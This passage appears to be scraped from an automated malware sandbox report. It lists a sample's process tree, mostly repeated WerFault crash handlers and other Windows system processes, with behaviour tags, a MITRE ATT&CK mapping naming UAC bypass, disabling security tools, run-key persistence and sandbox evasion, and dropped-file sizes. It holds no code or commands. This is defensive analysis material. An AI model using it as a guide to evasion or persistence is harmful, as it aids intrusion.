C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7740 -ip 77401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1628 -ip 16281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5192 -ip 51921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4172 -ip 41721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8024 -ip 80241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3152 -ip 31521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7880 -ip 78801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5212 -ip 52121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7436 -ip 74361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7264 -ip 72641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1300 -ip 13001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 720 -p 6148 -ip 61481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 8352 -ip 83521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7912 -ip 79121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 760 -p 1636 -ip 16361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 9720 -ip 97201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4236 -ip 42361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 3924 -ip 39241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8244 -ip 82441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1452 -ip 14521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5636 -ip 56361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 9920 -ip 99201⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4536 -ip 45361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 10332 -ip 103321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 10512 -ip 105121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3224 -ip 32241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 10760 -ip 107601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 12168 -ip 121681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 1272 -ip 12721⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 756 -p 3092 -ip 30921⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3092 -s 22601⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 13656 -ip 136561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 14596 -ip 145961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 15180 -ip 151801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 11560 -ip 115601⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
-
-
\Windows\System32\sihost.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 14684 -ip 146841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 15648 -ip 156481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 13796 -ip 137961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 9928 -ip 99281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 17020 -ip 170201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 13028 -ip 130281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 12316 -ip 123161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 17652 -ip 176521⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 5088 -ip 50881⤵
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\2e7a52dec8c04a88b206a75d7cb29250 /t 13832 /p 30441⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\5a9caf88349e4292a090d52989d59894 /t 11088 /p 177641⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5300 -ip 53001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 9192 -ip 91921⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5File Deletion
1Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
-
-
Filesize
128KB
-
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
188KB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
Filesize
6.1MB
-
-
Filesize
1.4MB
-
Filesize
912KB
-
-
Filesize
5.6MB
-
Filesize
4KB
-
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
8KB
-
-
Filesize
5.6MB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
-
Filesize
628KB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
Filesize
628KB
-
Filesize
456KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
5.6MB
-
-
-
Filesize
188KB
-
-
Filesize
1.4MB
-
Filesize
6.1MB
-
-
Filesize
192KB
-
Filesize
6.1MB
-
-
Filesize
128KB
-
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
5.6MB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
2.1MB
-
-
Filesize
2.1MB
-
-
-
Filesize
6.1MB
-
-
Filesize
5.6MB
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
Filesize
12KB
-
-
Filesize
1.2MB
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
64KB
-
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
Filesize
36KB
-
-
-
-
Filesize
5.6MB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
40KB
-
-
Filesize
6.1MB
-
-
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
4KB
-
-
Filesize
5.6MB
-
-
-
Filesize
6.1MB
-
-
-
Filesize
5.6MB
-
-
-
Filesize
6.1MB
-
Filesize
6.1MB
-
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
6.1MB
-
-
Filesize
4KB
-
-
-
-
-
Filesize
6.1MB
-
-
-
-
Filesize
6.1MB
-
-
-
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB